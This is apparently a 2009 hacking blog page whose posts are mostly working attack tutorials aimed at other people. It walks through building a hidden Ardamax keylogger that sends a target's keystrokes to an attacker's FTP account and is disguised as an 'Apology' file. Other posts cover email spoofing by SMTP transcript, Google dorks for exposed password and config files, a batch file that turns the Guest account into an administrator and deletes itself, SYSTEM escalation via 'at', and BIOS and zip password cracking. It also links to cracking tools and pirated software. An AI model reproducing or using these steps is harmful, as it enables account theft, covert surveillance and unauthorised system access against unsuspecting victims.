Your Ad Here
Showing posts with label Hacking passwords. Show all posts
Showing posts with label Hacking passwords. Show all posts

Thursday, August 6, 2009

How to hack any email password(Using a keylogger)

How to hack yahoo, msn, orkut, gmail or any websites login user name & password anything, you can hack anything using keylogger,keylogger is also known as keystroke logger keylogger is a hardware device or small program that monitors each keystroke a user types ...

How To Make A Keylogger & hack passwords of anysite using this!!!
I ll show u step by step process for successfully creating keylogger, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of receiving information, and that's an FTP. I also do not protect the files.

Download it from here.

http://www.ziddu.com/download/5944172/ArdamaxKeylogger3.1FB92.zip.html


After downloading, extract the .zip file.open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.

NOTE:You may have to disable your antiVirus in order to install the keylogger because a lot of antiviruses detect keyloggers as viruses.BUT THEY ARE NOT!!!!


Now open the serial.txt file.

Now, open it, and it should give you a name and a jumble of letters and numbers.

Go back to the Ardamax icon at the bottom right, and right-click it.

Click the "Enter Registration Key" button.

Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package.

~NOTE~

If u interested in attaching a keylogger for an already existed file, move on and just place it on ur desktop.

~NOTE~

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Further if ur interested in attaching ur keylogger for an already existing file, click the box which says that "Append keyloggers engine "

If u tic it, click Browse, and select da file.

If ur not yet satisfied ,move down. Da installations folder on the target- computer needs to remain Windows System Folder for added security, so leave it be

U can add an additional component which u like i leave it mine as "log viewer" as i want to grab are da p/w's for gamez

From this point, click next.

Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.

Can't have that, now can we?

Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose what you want to see. I have taken " screenshots". as it cause lagging .

You Leav dat 'log format' alonee.

U can choosee 2 send logs if it is exceeding to a certain size, or if ur interested in send no matter wat, untic the box, wat i have done.

Continue on! (next.)

Now the fun part. -_-.

Head on over to:

http://www.drivehq.com/.

Make an account, etc etc.Click here to go signup there.


Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, login and create a new folder/directory.

Create a directory by any name you want. My favorite is "HACK".

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.drivehq.com

In "Remote Folder", put in the new directory's name you made. So, in this scenario, "HACK" without the "'s.

Fill in your Username and Password.

I left dat "Passive Mode checked" as I'm not aware of what it does, rofl. :[

you can leave dat port also alone . It's default.

You have to be sure that everything till now is correctly done by u , click it on test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "HACK" directory and there should be a test file in it.

Click next, if you're still alive.

Tick anything and everything you want.

Next.

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse the page wer u want to place da keylogger. u have a plus point of changing the icon, which is nifty. If u want to apologies to ur friend, u can change & make ur own icon just goto notepad and name it as "Apology", dats it u r done with it
Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.

Feel free to test it out on yourself. Reply me if you like it......

Saturday, August 1, 2009

Fake Emails | Send Fake Email | Email Pranks | How To

THIS TUTORIAL WILL TELL YOU HOW TO SEND FAKE EMAIL TO ANY EMAIL BOX SUCH AS YAHOO, GMAIL, HOTMAIL AND SO ON… THE ART OF SENDING FAKE EMAIL IS CALLED EMAIL FORGING OR EMAIL SPOOFING.FOR EXAMPLE YOU CAN SEND FAKE EMAIL TO YOUR FRIEND AS BILL GATES .IT’S 100% WORKING.

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain.But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.Also many of the websites offer you to send fake email from their sites where none of them work.So we have to run our own SMTP server on our computer to successfully send a fake email.SMTP server is a simple software program which can be installed on your computer in few seconds.SMTP server allows you to send fake email right from your desktop easily and effectively.Download QK SMTP server HERE

.This is the SMTP server i am using in my tutorial.Once you download and install the server on your comp then you are all set to send fake email successfully.This works 100%,so trust me & continue.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1″

4. Set port to “25″

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running).If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:\>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number.SO you are connecting to the SMTP server running on your own computer.This step is very importand to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step

3.Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message.The response of a OK SMTP server is given below. Message within brackets is only explanation.

Post By: Hak9.com
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice.This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates billg@microsoft.com
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP.IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

End the body of email by pressing [ENTER] .(dot) [ENTER] | Hak9.com

250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)
*****END OF EMAIL FORGING*****
Here’s the screenshot for your convenience

NOTE: The fake email that you have sent may also reach the spam/bulk box.So if you are trying a fake email test on your own inbox then please do check the spam/bulk box also.

Best Hacking Ebooks Collection AiO CW


Download:

http://rapidshare.com/files/133852425/www.cyberwarez.info.rar
Say Thanks and NJOY
Password:
www.cw-network.info

Super Bluetooth hack 1.8


 Super Bluetooth hack uses Bluetooth AT commands to access /hack other Bluetooth enabled handsets . You can access others SMS ,contacts make calls ,shut down device etc .

Super Bluetooth hack is a Java software . So it works in Nokia ,
SonyEricsson , LG ,Samsung and all other phones with Java support .Download 
Super Bluetooth hack 1.8 here .

Though the name of the software is Bluetooth hack ,it doesn’t perform any kind of hacking .Actually the hacking mode seems to be working only in some low security 
Sonyericsson phones . In High -end Nokia ,LG ,Samsung phones ,the target device should accept the incoming Bluetooth connections to make Bluetooth hack work . So first you need to play some tricks to make the targets phone connected to your device ( Just ask him to send a song ). Later then you can start Bluetooth hacking .

 
Super Bluetooth hack 1.8 features :

Connect any phone via Bluetooth or Infrared .
Turn off , read SMS , send SMS ,make calls ,Read phone book .


Super Bluetooth hack 1.8 supported Nokia devices .

Nokia: 1680c, 2355, 2600 classic, 2610, 2626, 2630, 2650, 2660, 2680, 2760, 2855, 2855i, 2865, 2865i, 3100, 3105, 3109 classic, 3110c, 3120, 3120 classic, 3125, 3152, 3155, 3155i, 3200, 3220, 3230, 3250, 3300, 3410, 3500, 3510, 3510i, 3530, 3555, 3586i, 3587, 3595, 3600, 3600 slide, 3620, 3650, 3660, 5000, 5070, 5100, 5140, 5140i, 5200, 5220 XpressMusic, 5300, 5310 XpressMusic, 5320 XpressMusic, 5500, 5610, 5700, 5800 XpressMusic, 6010, 6015, 6020, 6021, 6030, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6100, 6101, 6102, 6102i, 6103, 6108, 6110 Navigator, 6111, 6120, 6120c, 6121 classic, 6125, 6126, 6131, 6133, 6151, 6152, 6155, 6165, 6165i, 6170, 6200, 6210 Navigator, 6220, 6220 Classic, 6225, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6260, 6265, 6265i, 6267, 6270, 6275i, 6280, 6288, 6290, 6300, 6301, 6310i, 6500c, 6500s, 6555, 6585, 6600, 6600 slide, 6610, 6610i, 6620, 6630, 6650, 6651, 6670, 6680, 6681, 6682, 6708, 6800, 6810, 6820, 6822, 7070, 7200, 7210, 7210 Supernova, 7250, 7250i, 7260, 7270, 7360, 7370, 7373, 7390, 7500, 7510 Supernova, 7600, 7610, 7610 Supernova, 7650, 7710, 8600 Luna, 8800, 8800 Sirocco, 8910i, 9210, 9290, 9300, 9300i, 9500, E50, E51, E60, E61, E61i, E62, E65, E66, E70, E71, E90, N-Gage, N-Gage QD, N70, N70-1, N71, N72, N73, N75, N76, N77, N78, N79, N80-1, N81, N81 8GB, N82, N85, N90, N91, N92, N93, N93i, N95, N95 8GB, N96



Super Bluetooth hack 1.8 supported 
SonyEricsson devices :

Sony-Ericsson: C702, C902, C905, D750, D750i, F305, F500i, G502, G700, G900, J200i, J210i, J220i, J230i, J300a, J300i, K200i, K300, K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i, K550i, K600, K600i, K608i, K610, K610i, K618i, K630, K660i, K700, K700c, K700i, K750, K750i, K770, K790a, K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P800, P900, P910, P910a, P910i, P990i, S302, S500i, S700, S700i, S710a, T226, T230, T250i, T290a, T290i, T610, T616, T630, T637, T650i, T68, V600, V600i, V630i, W200a, W200i, W300, W300i, W350, W380, W550c, W550i, W580i, W600c, W600i, W610i, W660i, W700i, W710i, W760, W800c, W800i, W810i, W810iv, W830i, W850i, W850iv, W880i, W890i, W900i, W910i, W950i, W960, Z1010, Z200, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a, Z550i, Z555, Z558i, Z600, Z610i, Z710i, Z750, Z800

Download 
Super Bluetooth hack 1.8



Wednesday, July 15, 2009

How To Hack Orkut ???

Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.
First Level- Security-SSL or 128 bit secured connection
Second Level- Google account checks for cookie in the sytem of user
Third Level- Google provides a redirection to the entered User information
Fourth Level- Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!

Using Keyloggers is one of the easiest way to hack an Orkut (or any other email) password.Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

Phishing Attack is the most popular way of hacking/stealing other’s password.By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.So be careful, javascripts can even be used to hack Orkut!

Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’.This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker.Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

If you would like to share something, comment here and I will add up here with a credit to your name

AIO Crack Searching & Shareware Hacking 2008


Info
a- Crack Searching Programms:

1- Craagle v1.91
2- CrackDownloader Plus v2.2 (released 10/07/2005)
3- Serials3k
4- Crack Searcher
5- Crack Buster v1.3
6- Galaxy search
7- Crack Wizard

b- Shareware Hacking Programs:

1- Never Expire v2.0
2- Trial Doctor v1.3.1
3- Trial Reset v2.5
4- MicroBest CrackLock v3.8.4
5- Date Cracker 2000
6- Date Facker 32
7- Date Hacking v1.2

c- AIO eBook bonus:

Beginner Olly Cracking Tutorials
[9 detailed step-by-step tutorials]

Beginner tutorial 1: Serial fishing
Beginner tutorial 2: Internal Keygen and Patching
Beginner tutorial 3: Unpacking and Patching
Beginner tutorial 4: unpacking and patching, a more complex case v.1.1
Beginner Tutorial 5: Inline Patching
Beginner Tutorial 6: Packers theory v1.1
Beginner Tutorial 7: Cracking using Memory BP’s
Beginner Tutorial 8: Breakpoints Theory v1.2
Beginner Tutorial 9: Defeating Magic Byte Protection

Download:

http://w16.easy-share.com/1702589431.html


Rapid Hacker v4.5 Immortality Edition


Rapid Hacker is the ultimate tools for Hacking Rapidshare for free downloading from its site by faking IP Addresses

Download:
Depositfiles
Click to Download from DepositFiles
Easy Share
Click to Download from Easy-Share
MegaUpload
Click to Download from MegaUpload

The best friend of a hacker - GOOGLE

Google hacking at its finest..


Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3’s
…… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in. 

Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”


Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

# -FrontPage-” inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

“AutoCreate=TRUE password=*” 
This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author’s site at: http://www.coara.or.jp/~passy/

“http://*:*@www” domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

http://*:*@www” bangbus or “http://*:*@www”bangbus

Another way is by just typing
“http://bob:bob@www”

“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:”htaccess|passwd|shadow|htusers”
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

Let’s pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - “Windows XP Professional” 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.

or if you want to find the serial for winzip 8.1 - “Winzip 8.1″ 94FBR

How to Change Password on Windows without Original Password

Here is a little guide that I have made which teaches you how to change the password of any account on the computer you are currently using without knowing the original password. This is useful for many occasions such as if you forget the password to your primary account on your computer but still have access to another 0ne or if you simply want to prank your family members. 

This has been tested on both Windows XP and Windows 7.

For this to work you must have access to another account because you have to use Command Prompt or CMD to change the password.

Here is how to do it:
Open Command Prompt (CMD) by going to Start -> Run -> cmd.exe
Type in ‘net users’. This will show you a list of all the accounts on the computer. This is just to check and make sure you know the EXACT username of the account you want to change the password for.
Next, you need to type in ‘net user (whatevertheusernameis) *


Next you shall get a prompt asking you for the new password:



Finally it shall ask you to repeat the new password, click enter and BAM, you have now changed the password without knowing the original one

Passsword crackers ALL IN ONE

This password cracking pack includes 6 different crackers used for :
* Asteric Logger
* Dial-Up Password
* IM Passwords
* Mail Client Passwords
* Network Password
* Protected Storage Passwords

http://rapidshare.com/files/239339781/Password.Crackers.AIO.rar

http://www.easy-share.com/1905465510/Password.Crackers.AIO.rar

Friday, July 10, 2009

Crack BIOS password

Want to learn how to crack bios password here is the best way to crack the bios password in win 95/98:

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: "debug" (without quotes ninja.gif )
4) type the following lines now exactly as given.......
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine


password protection gone!!!!!!!!!!!!! biggrin.gif

EnjoYYYYYYYYYY

PS: I tested this in Award Bios........
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data..........


The use of this code is entirely at ur risk.......... It worked fine for me..........

Cracking zip password files

How to crack zip password files given below is best tut to crack password for zip files..
Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program

Hack admin from xp guest account(Thats possible )

Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


~ Cheers ~



* Haking "admin" from "user" mode n more



really that is possible !

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:


You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.


Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.


Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe



A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu


explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.





ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
